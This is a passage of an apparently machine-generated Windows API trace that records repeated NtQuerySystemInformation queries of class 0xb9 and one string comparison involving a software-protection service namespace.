(SystemInformationClass=0xb9, SystemInformation=0xc751dfc530, Length=0x20, ResultLength=0x0) [0269.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x58, ResultLength=0x0) [0269.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.354] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0269.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.357] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0269.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0269.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0269.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x28, ResultLength=0x0) [0269.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x28, ResultLength=0x0) [0269.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0269.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0269.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.359] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0269.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0269.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0269.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0269.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc480, Length=0x20, ResultLength=0x0) [0269.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc400, Length=0x20, ResultLength=0x0) [0269.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc400, Length=0x20, ResultLength=0x0) [0269.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc400, Length=0x20, ResultLength=0x0) [0269.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0269.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0269.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0269.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0269.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0269.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0269.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0269.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0269.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0269.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0269.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0269.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x38, ResultLength=0x0) [0269.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc570, Length=0x20, ResultLength=0x0) [0269.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc500, Length=0x20, ResultLength=0x0) [0269.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc500, Length=0x20, ResultLength=0x0) [0269.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca68, Length=0x50, ResultLength=0x0) [0269.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x38, ResultLength=0x0) [0269.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0269.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0269.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0269.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0269.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0269.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x38, ResultLength=0x0) [0269.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x28, ResultLength=0x0) [0269.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8b0, Length=0x28, ResultLength=0x0) [0269.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x38, ResultLength=0x0) [0269.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x20, ResultLength=0x0) [0269.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0269.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0269.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0269.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc990, Length=0x38, ResultLength=0x0) [0269.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc810, Length=0x20, ResultLength=0x0) [0269.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x20, ResultLength=0x0) [0269.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x20, ResultLength=0x0) [0269.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x50, ResultLength=0x0) [0269.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.374] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0269.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0269.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0269.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0269.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc670, Length=0x28, ResultLength=0x0) [0269.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x28, ResultLength=0x0) [0269.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0269.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x28, ResultLength=0x0) [0269.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0269.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x20, ResultLength=0x0) [0269.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0269.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x38, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x20, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x20, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.381] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0269.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f8, Length=0x50, ResultLength=0x0) [0269.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x38, ResultLength=0x0) [0269.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0269.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0269.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc650, Length=0x28, ResultLength=0x0) [0269.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x28, ResultLength=0x0) [0269.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x38, ResultLength=0x0) [0269.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0269.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0269.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x38, ResultLength=0x0) [0269.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6a0, Length=0x20, ResultLength=0x0) [0269.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc620, Length=0x20, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 